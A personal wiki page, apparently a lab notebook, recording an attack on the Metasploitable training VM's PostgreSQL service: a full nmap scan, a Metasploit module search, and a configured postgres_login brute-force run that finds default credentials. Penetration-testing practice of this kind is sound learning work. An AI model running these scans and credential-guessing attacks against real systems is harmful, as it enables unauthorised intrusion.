Metasploitable/Postgres: Difference between revisions
From charlesreid1
| Line 143: | Line 143: | ||
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name. | One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name. | ||
== | ==postgres_login== | ||
The postgresql login attack is at | The postgresql login attack is at | ||
Revision as of 10:07, 25 March 2016
This page covers activities on the Metasploitable virtualbox related to the postgresql service that is running.
Recon
Recon
Reminder, the remote machine (Metasploitable) is available at 10.0.0.27.
$ nmap -sS -sV -A 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT Nmap scan report for 10.0.0.27 Host is up (0.016s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 42810/tcp mountd | 100005 1,2,3 45599/udp mountd | 100021 1,3,4 34385/tcp nlockmgr | 100021 1,3,4 60702/udp nlockmgr | 100024 1 38085/udp status |_ 100024 1 52004/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:05:20 | source ident: nmap | source host: 6D4CD63B.D3975B40.7B559A54.IP |_ error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2016-03-22T21:31:31-04:00 TRACEROUTE HOP RTT ADDRESS 1 16.11 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
Search Metasploit for Exploits
msf auxiliary(postgres_version) > search postgresql Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal Ruby on Rails Devise Authentication Password Reset auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query auxiliary/scanner/postgres/postgres_dbname_flag_injection normal PostgreSQL Database Name Command Line Flag Injection auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe auxiliary/server/capture/postgresql normal Authentication Capture: PostgreSQL exploit/linux/postgres/postgres_payload 2007-06-05 excellent PostgreSQL for Linux Payload Execution exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection exploit/windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution post/linux/gather/enum_users_history normal Linux Gather User History
Scanner
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.
postgres_login
The postgresql login attack is at
msf > use auxiliary/scanner/postgres/postgres_login
Info
Information/description of the postgres login attack is given below:
Description: This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
The various options for the postgres login attack are given below:
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE template1 yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME postgres no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts
Set Variables
To do this attack, we will want to set the following variables:
- try blank passwords
- set bruteforce speed to 5
- database - ??? (postgresql, or same databases as mysql)
- password file (see Kali/Wordlists)
- remote hosts 10.0.0.27 (metasploitable machine)
- stop on success true
- username file (contains root, guest, postgres)
- verbose
Things I'm not sure about:
- mainly how you know what database names are
After setting and unsetting a few variable values, we're ready to rock:
msf auxiliary(postgres_login) > show options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DATABASE postgresql yes The database to authenticate against DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETURN_ROWSET true no Set to true to see query result sets RHOSTS 10.0.0.27 yes The target address range or CIDR identifier RPORT 5432 yes The target port STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME root no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line VERBOSE true yes Whether to print output for all attempts
Results With Incorrect DB Name
Suppose you are able to correctly guess the username and password of the PostgreSQL database, but not the database name.
In this case, PostgreSQL will return a different code, and Metasploit will tell you that your credentials were good but that your database name was bad:
msf auxiliary(postgres_login) > run [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: root:@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:postgres@postgresql (Incorrect: C3D000, Creds were good but database was bad) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:password@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:admin@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:admin@postgresql (Incorrect: Invalid username or password) [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:password@postgresql (Incorrect: Invalid username or password) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Unfortunately, during a brute-force attack, this information will fly by, and we would never know unless we were logging output to a file, and went back and checked it at some point. Lots of wasted time. Not particularly efficient.
Back to Defaults
Keeping this simple. Trying the default database name of "template1"
Bingo:
msf auxiliary(postgres_login) > run [-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: root:@template1 (Incorrect: Invalid username or password) [+] 10.0.0.27:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(postgres_login) >
Related
